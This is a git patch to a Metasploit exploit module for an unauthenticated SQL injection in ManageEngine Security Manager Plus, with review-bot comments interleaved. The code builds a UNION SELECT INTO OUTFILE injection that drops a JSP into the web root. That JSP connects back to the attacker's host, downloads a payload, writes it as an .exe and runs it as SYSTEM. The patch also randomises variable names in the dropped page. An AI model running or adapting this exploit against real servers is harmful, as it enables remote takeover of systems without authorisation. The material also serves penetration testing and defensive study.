From 669d22c917926e0a7576ea5c11f069cbdb028979 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Tue, 23 Oct 2012 02:05:08 -0500
Subject: [PATCH] Final improvements
---
.../windows/http/manage_engine_sqli.rb | 95 +++++++++++--------
1 file changed, 58 insertions(+), 37 deletions(-)
diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb
index 064c335731..7d22cb3ab0 100644
--- a/modules/exploits/windows/http/manage_engine_sqli.rb
+++ b/modules/exploits/windows/http/manage_engine_sqli.rb
@@ -21,21 +21,23 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious
- executable under the context of SYSTEM. No authentication is necessary to exploit this.
+ executable under the context of SYSTEM. Authentication is not required in order
+ to exploit this vulnerability.
}, 'License' => MSF_LICENSE, 'Author' => [
- 'xistence' # Discovery & Metasploit module
+ 'xistence ', # Discovery & Metasploit module
+ 'sinn3r' # Improved Metasploit module
], 'References' => [
- ['EDB','22094']
+ ['EDB','22094'],
+ ['BID', '56138']
], 'Platform' => 'win', 'Targets' => [
- # Win XP / 2003 / Vista / Win 7 / etc
['Windows Universal', {}] ], 'Privileged' => false,
@@ -53,12 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
# A very gentle check to see if Security Manager Plus exists or not
#
def check
- res = send_request_raw({
- 'method' => 'GET',
- 'uri' => '/SecurityManager.cc'
- })
+ res = send_request_raw({'uri' => '/SecurityManager.cc'})
- if res and res.body =~ /\Security Manager Plus\<\/title\>/
+ if res and res.body =~ /\SecurityManager Plus\<\/title\>/
return Exploit::CheckCode::Detected
else return Exploit::CheckCode::Safe
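Review bot: The new author entry `'xistence ',` keeps a trailing space inside the string literal, which is printed verbatim in the module's info output and differs from the `'sinn3r'` entry beside it. If the space is only the remnant of an e-mail address stripped from this rendering of the patch it can be ignored; otherwise `'xistence',` is the intended form.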
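Review bot: The title regexp in `check` starts with `\S`, which Ruby reads as the non-whitespace character class rather than a literal `S`, so `/\SecurityManager Plus\<\/title\>/` matches the product title only because `S` happens to satisfy that class; if the `<title>` opener was lost when this patch was rendered, disregard this, otherwise drop the backslash or anchor on the full tag, e.g. `/<title>SecurityManager Plus<\/title>/`. The condition `res and res.body =~ …` mixes `and` into boolean logic where `&&` avoids the precedence surprise. Returning `Detected` rather than a vulnerable verdict is the right call, since a title match says nothing about the patch level of the install. The closing `end` of `check` lies outside the hunk.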
@@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def on_new_session(cli)
if cli.type != 'meterpreter'
- print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
+ print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
return
end
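Review bot: The message interpolates a concatenation, `#{@jsp_name + '.jsp'}`, where `#{@jsp_name}.jsp` reads the same and avoids the intermediate String#+; the same pattern recurs in the `print_status` and `send_request_raw` lines of the last hunk. Switching to `print_warning` fits, since the session itself is usable and only the automatic removal of the dropped JSP is skipped. The body of on_new_session continues below the hunk.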
@@ -105,33 +104,43 @@ class Metasploit3 < Msf::Exploit::Remote
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
my_port = datastore['SRVPORT']
+ var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
+ var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
+ jsp = %Q|
<%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%> <%
- StringBuffer buf = new StringBuffer();
- byte[] shellcode = null;
- BufferedOutputStream outstream = null;
+ StringBuffer #{var_buf} = new StringBuffer();
+ byte[] #{var_shellcode} = null;
+ BufferedOutputStream #{var_outstream} = null;
try {
- Socket s = new Socket("#{my_host}", #{my_port});
- BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
- while (buf.length() < #{@native_payload.length}) {
- buf.append( (char) r.read());
+ Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
+ BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
+ while (#{var_buf}.length() < #{@native_payload.length}) {
+ #{var_buf}.append( (char) #{var_bufreader}.read());
}
- BASE64Decoder decoder = new BASE64Decoder();
- shellcode = decoder.decodeBuffer(buf.toString());
+ BASE64Decoder #{var_decoder} = new BASE64Decoder();
+ #{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
- File temp = File.createTempFile("#{@native_payload_name}", ".exe");
- String path = temp.getAbsolutePath();
+ File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
+ String #{var_path}
= #{var_temp}.getAbsolutePath();
- outstream = new BufferedOutputStream(new FileOutputStream(path));
- outstream.write(shellcode);
- outstream.close();
+ #{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
+ #{var_outstream}.write(#{var_shellcode});
+ #{var_outstream}.close();
- Process p = Runtime.getRuntime().exec(path);
+ Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {} %> |
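Review bot: The nine `Rex::Text.rand_text_alpha(rand(8) + 3)` assignments repeat the same expression line by line; a multiple assignment states the intent once while keeping the names, e.g. `var_buf, var_shellcode, var_outstream, var_socket, var_bufreader, var_decoder, var_temp, var_path, var_proc = Array.new(9) { Rex::Text.rand_text_alpha(rand(8) + 3) }`. The renaming only changes the text of the generated page; what it does on the host — a temp file created with an `.exe` suffix by `File.createTempFile` and then started through `Runtime.getRuntime().exec` from the servlet container — is unchanged, and that sequence is what host-based monitoring would key on. generate_jsp_payload begins before this hunk (the `my_host` assignment is mid-method) and its `end` lies after it.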
@@ -151,36 +160,48 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 1) # Inject our JSP payload
- print_status("#{rhost}:#{rport} - Sending JSP payload")
- pass = rand_text_alpha(rand(10)+5)
hex_jsp = generate_jsp_payload
- cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'
+ cookie = 'STATE_COOKIE=&'
+ cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
+ cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
+ cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
+ cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
+ cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
+ cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
+ cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
+ cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
+ cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
+ rnd_num = Rex::Text.rand_text_numeric(1)
+ sqli = "#{rnd_num})) union select 0x#{hex_jsp},"
+ sqli << (2..28).map {|e| e} * ","
+ sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+
+ state_id = Rex::Text.rand_text_numeric(5)
+ print_status("#{rhost}:#{rport} - Sending JSP payload")
res = send_request_cgi({ 'method' => 'POST',
- 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP',
+ 'uri' =>
"/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp", 'headers' => { 'Cookie' => cookie, 'Accept-Encoding' => 'identity' }, + 'vars_get' => { + 'reqType' =>'AdvanceSearch', + 'SUBREQUEST' =>'XMLHTTP' + }, 'vars_post' => { 'ANDOR' => 'and', 'condition_1' => 'OpenPorts@PORT', 'operator_1' => 'IN', - 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'value_1' => sqli, 'COUNT' => '1' } }) print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{@jsp_name + '.jsp'}", - 'headers' => { - 'Cookie' => 'pwnage' - } - }) + send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"}) handler end